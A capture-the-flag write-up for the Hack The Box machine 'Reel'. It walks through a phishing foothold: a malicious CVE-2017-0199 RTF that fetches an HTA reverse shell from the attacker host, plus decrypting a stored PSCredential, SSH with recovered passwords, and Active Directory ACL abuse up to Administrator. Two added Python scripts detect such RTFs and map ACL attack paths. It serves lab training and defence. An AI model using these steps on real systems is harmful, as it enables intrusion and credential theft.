Reel HTB

IP

10.129.34.39

initial nmap scan

sudo nmap -p- --min-rate 10000 10.129.34.39 | cut -d"/" -f1 | tr '\n' ','

We have the following ports open on the target:

21,22,25,135,139,445,593,49159

Let's run a more in-depth scan of the open ports:

sudo nmap -sCV -p21,22,25,135,139,445,593,49159 -oA TCP_ports 10.129.34.39

Results

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie: 
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-16T05:51:02
|_  start_date: 2024-01-16T05:41:44
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2024-01-16T05:50:58+00:00
|_clock-skew: mean: -4s, deviation: 0s, median: -5s
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 234.68 seconds

Looking at the results

  • Windows Server 2012 R2 Standard 9600

  • FTP is enabled and allows anonymous auth

  • SSH is enabled (haven't seen that on a windows box before)

  • SMB is enabled

  • We have both the domain name HTB.LOCAL and the computer name REEL, we will add these to our /etc/hosts file

  • SMTP is possibly enabled, will check this out

  • RPC

  • NetBIOS

Let's start with FTP

We find the documents directory, which contains 3 files

After downloading the files, I noticed I had problems trying to download the "Windows Event Forwarding.docx" file, but switching to binary mode in ftp fixed the problem

readme.txt

  • Short message, possibly a hint of what kind of documents we can read

  • Maybe we have to construct some sort of phishing email?

  • More specifically, what is RTF?

    • Rich Text Format: these files are essentially text files, but can store extra information such as font styles, formatting, images, etc.

AppLocker.docx

  • Short message, but could be handy to know when we get code execution

Windows Event Forwarding.docx

  • longer list

Checking the metadata

We do find a possible user on the system

SMTP enumeration

Notice in our Nmap scan that the following SMTP commands are enabled

We should be able to confirm whether the email address we found exists on the server

nico@megabank.com is found on the SMTP server

We have now confirmed nico@megabank.com exists on the SMTP server. Okay, so what now?

Alright, we have

  • an email address within the SMTP server

  • a readme.txt: "please email me any rtf format procedures - I'll review and convert." Someone is expecting emails to be sent to them

  • using searchsploit we do find something interesting, CVE-2017-0199. Given the machine was created in 2018, this is the most likely intended foothold

  • it also gives us the following github link

To exploit CVE-2017-0199, we need to get a user on the system to open our malicious RTF file, which in turn makes an HTTP request for an HTA file. We want that HTA file to execute a reverse shell on the target machine

Let's walk through the steps

  1. We want to generate a malicious HTA file that will execute on the system, giving us a reverse shell

  2. Now we can create a malicious RTF file using the git repo above with the following options

  • -M gen: generate document

  • -w whatAreYouWaiting4.rtf: output file name

  • -u http://10.10.16.3/pickmeup.hta: URL to pick up the payload from

  • -t rtf: create an RTF file

  • -x 0: disable RTF obfuscation

  3. Set up a netcat listener

  4. Start a Python web server with our payload residing in it

  5. Now we just need to send the email

  • -f: from address, will send from the same domain to be safe

  • -t: to address, nico@megabank.com

  • -u: subject

  • -m: body

  • -a: attachment

  • -s: SMTP server

  • -v: verbose

After waiting, say, 20 seconds we have a shell on the system
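The foothold above works because the RTF carries an auto-updating OLE link whose target is fetched over HTTP when the document is opened. As an added example (not part of the original writeup), here is a small Python triage script that flags that combination in an RTF file; the sample document is constructed from the walkthrough's file name and URL and contains only the markers a scanner keys on, not a working document:

```python
import re

# Control words that mark an embedded OLE object as an auto-updating link in
# CVE-2017-0199 style RTF documents; the OLE2Link data then carries the remote
# (HTTP) target, e.g. an HTA file, that Word fetches on open.
SUSPICIOUS_CONTROL_WORDS = (b"\\objautlink", b"\\objupdate")
OLE2LINK_MARKER = b"OLE2Link"
ASCII_URL = rb"https?://[\x21-\x7e]+"
# OLE monikers store the target as UTF-16LE, so match NUL-interleaved text too
UTF16_URL = rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+"

def objdata_blobs(rtf: bytes) -> list:
    """Decode every \\objdata hex payload (hex may be whitespace-wrapped)."""
    blobs = []
    for m in re.finditer(rb"\\objdata\s*([0-9a-fA-F\s]+)", rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        hexstr = hexstr[: len(hexstr) - len(hexstr) % 2]  # drop odd nibble
        blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs

def extract_urls(data: bytes) -> list:
    urls = {u.decode("ascii") for u in re.findall(ASCII_URL, data)}
    urls |= {u.decode("utf-16-le") for u in re.findall(UTF16_URL, data)}
    return sorted(urls)

def scan_rtf(rtf: bytes) -> dict:
    """Flag RTF content that combines an auto-update OLE link with a URL."""
    blobs = objdata_blobs(rtf)
    found = [cw.decode() for cw in SUSPICIOUS_CONTROL_WORDS if cw in rtf]
    ole2link = any(OLE2LINK_MARKER in b for b in blobs)
    urls = sorted({u for b in blobs + [rtf] for u in extract_urls(b)})
    return {"control_words": found, "ole2link": ole2link, "urls": urls,
            "suspicious": bool(found) and (ole2link or bool(urls))}

# Constructed, non-functional sample: only the markers a scanner keys on, with
# the HTA URL from the walkthrough embedded as a UTF-16LE OLE2Link target.
_OLE = b"\x01\x05\x00\x00" + OLE2LINK_MARKER + \
    "http://10.10.16.3/pickmeup.hta".encode("utf-16-le")
SAMPLE_RTF = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\objw1\\objh1"
              b"{\\*\\objclass Word.Document.8}{\\*\\objdata "
              + _OLE.hex().encode("ascii") + b"}}}")
BENIGN_RTF = b"{\\rtf1\\ansi Just a note about RTF procedures.}"

if __name__ == "__main__":
    print(scan_rtf(SAMPLE_RTF))
    print(scan_rtf(BENIGN_RTF))
```

Mail gateways and sandboxes can apply the same check to RTF attachments before delivery, which is exactly where the walkthrough's email would have been caught.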

Priv Esc via nico

Looking through nico's desktop we can see an interesting file, cred.xml

We can see we have a serialized XML representation of a PSCredential object for the user tom

We need to decrypt the secure password, and to do so we can use the following one-liner

Let's break down this one-liner

  • powershell -c: tells PowerShell to run the string that follows as a command (-c is short for -Command)

  • $cred = Import-CliXml -Path cred.xml: we import cred.xml and assign it to the variable $cred; the Import-CliXml cmdlet deserializes the XML content into a PowerShell object, in this case our PSCredential object

  • $cred.GetNetworkCredential() | Format-List *: we then call the GetNetworkCredential() method on the $cred object. GetNetworkCredential() is typically used with a PSCredential object to retrieve the network credential, which exposes the password in clear text. Its output is piped to Format-List *, which displays all the properties of the object in list format

We are now left with a clear text password

We did see SSH during our enumeration, maybe we can SSH in as tom

  • it works

Priv Esc via Tom

We do find some interesting files within Tom's desktop

note.txt

Within C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

we find the file acls.csv, let's use scp to copy the file onto our local host

  • I'm not a massive fan of this layout in a csv file, there's gotta be a better way to view this data

Let's perform some dynamic port forwarding and see if we can get bloodhound-python to enumerate the system

  1. Establish the dynamic port forward, for this we will use plink

  • -ssh: Specifies that the connection should use the SSH protocol

  • tom@10.129.34.39: the user (tom) and host to connect to over SSH

  • -P 22: Specifies the port number (22) on the SSH server to connect to. The default SSH port is 22

  • -D 9000: Specifies dynamic port forwarding on the local machine. This sets up a SOCKS proxy on port 9000 on the local machine.

  • -pw "1ts-mag1c\!\!\!": Specifies the password (1ts-mag1c!!!) for the SSH user.

  2. Next we need to configure our proxychains.conf file

  3. We should be able to run bloodhound-python through our SOCKS proxy and connect to the ports that are running internally

  • proxychains: Proxies the traffic generated by bloodhound-python through the SOCKS proxy.

  • bloodhound-python: This is the BloodHound Python tool, which is used for Active Directory (AD) enumeration and analysis.

  • -u tom: Specifies the username (tom) for authenticating to the target Active Directory.

  • -p '1ts-mag1c!!!': Specifies the password (1ts-mag1c!!!) for the specified username.

  • -ns 10.129.34.39: Specifies the nameserver to use for DNS resolution, here the IP address of the domain controller.

  • -d htb.local: Specifies the domain name (htb.local) of the Active Directory environment.

  • -c all: Specifies that all collection methods should be used.

  • --dns-tcp: Specifies the use of TCP for DNS queries. This can be useful when DNS over UDP is restricted or blocked.

Now that bloodhound-python has run successfully, we can ingest the data

  1. Start neo4j

  • log in

  2. Start up BloodHound

We can mark our user TOM@HTB.LOCAL as owned; if we look at tom's "First Degree Object Control" we can see the following

We can see we have "WriteOwner" permission over CLAIRE@HTB.LOCAL, and CLAIRE@HTB.LOCAL has "GenericWrite" permission over the BACKUP_ADMINS group, meaning we can add members to the group.
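Rather than eyeballing acls.csv, the WriteOwner/GenericWrite chain above can be found mechanically, which is also how a defender audits for such chains before anyone abuses them. As an added example (not the writeup's or BloodHound's code), this Python script loads ACE rows in the legacy SharpHound acls.csv column layout (an assumption on my part) and breadth-first searches for abusable rights from one principal to a target; the rows are constructed to mirror the chain described:

```python
import csv
import io
from collections import deque

# Rights that let the holder take over the target object: change its owner,
# rewrite its DACL, write any attribute (incl. group membership) or use
# extended rights such as password reset. ReadProperty and the like are inert.
ABUSABLE_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                   "ExtendedRight", "AllExtendedRights"}

# Constructed sample rows using the column layout of the legacy SharpHound
# acls.csv ingestor (an assumption); this is not the acls.csv from the box.
SAMPLE_ACLS_CSV = """\
ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
claire@htb.local,USER,tom@htb.local,USER,WriteOwner,,AccessAllowed,False
backup_admins@htb.local,GROUP,claire@htb.local,USER,GenericWrite,,AccessAllowed,False
backup_admins@htb.local,GROUP,nico@htb.local,USER,ReadProperty,,AccessAllowed,False
backup_admins@htb.local,GROUP,tom@htb.local,USER,GenericAll,,AccessDenied,False
"""

def load_edges(csv_text: str) -> dict:
    """Map principal -> [(right, object)] for allowed, abusable ACEs only."""
    edges = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue  # deny ACEs grant nothing
        for right in row["ActiveDirectoryRights"].replace(" ", "").split(","):
            if right in ABUSABLE_RIGHTS:
                edges.setdefault(row["PrincipalName"].lower(), []).append(
                    (right, row["ObjectName"].lower()))
    return edges

def find_path(edges: dict, start: str, target: str):
    """Shortest chain of abusable ACEs from start to target (BFS), or None."""
    start, target = start.lower(), target.lower()
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, steps = queue.popleft()
        for right, obj in edges.get(node, []):
            step = f"{node} -[{right}]-> {obj}"
            if obj == target:
                return steps + [step]
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, steps + [step]))
    return None

if __name__ == "__main__":
    edges = load_edges(SAMPLE_ACLS_CSV)
    for p in ("tom@htb.local", "nico@htb.local"):
        print(p, "->", find_path(edges, p, "backup_admins@htb.local"))
```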

  • Alright, we need to own the user account claire

  1. Let's load PowerView.ps1 onto the system

Start a Python web server on our local machine

  2. Next we need to set tom as the owner of claire's ACL

  3. We can now give tom the permission to change claire's password via claire's ACL

  4. Now we can create a $cred credential variable and change claire's password

Now we should be able to SSH into claire's account

  • we are in

Alright, let's add claire to BACKUP_ADMINS

  1. We can use the net command

  2. Let's check who is in the group now

Now that claire is part of BACKUP_ADMINS

  • Had to log out and back in for the changes to take effect, weird right?

Let's check the permissions on the Administrator's directory

While trying to read the root.txt flag we get a big fat access denied

But we do find a directory full of backup scripts, looking through the scripts we do come across a possible administrator's password

Let's see if we can SSH in as the Administrator

  • we are in
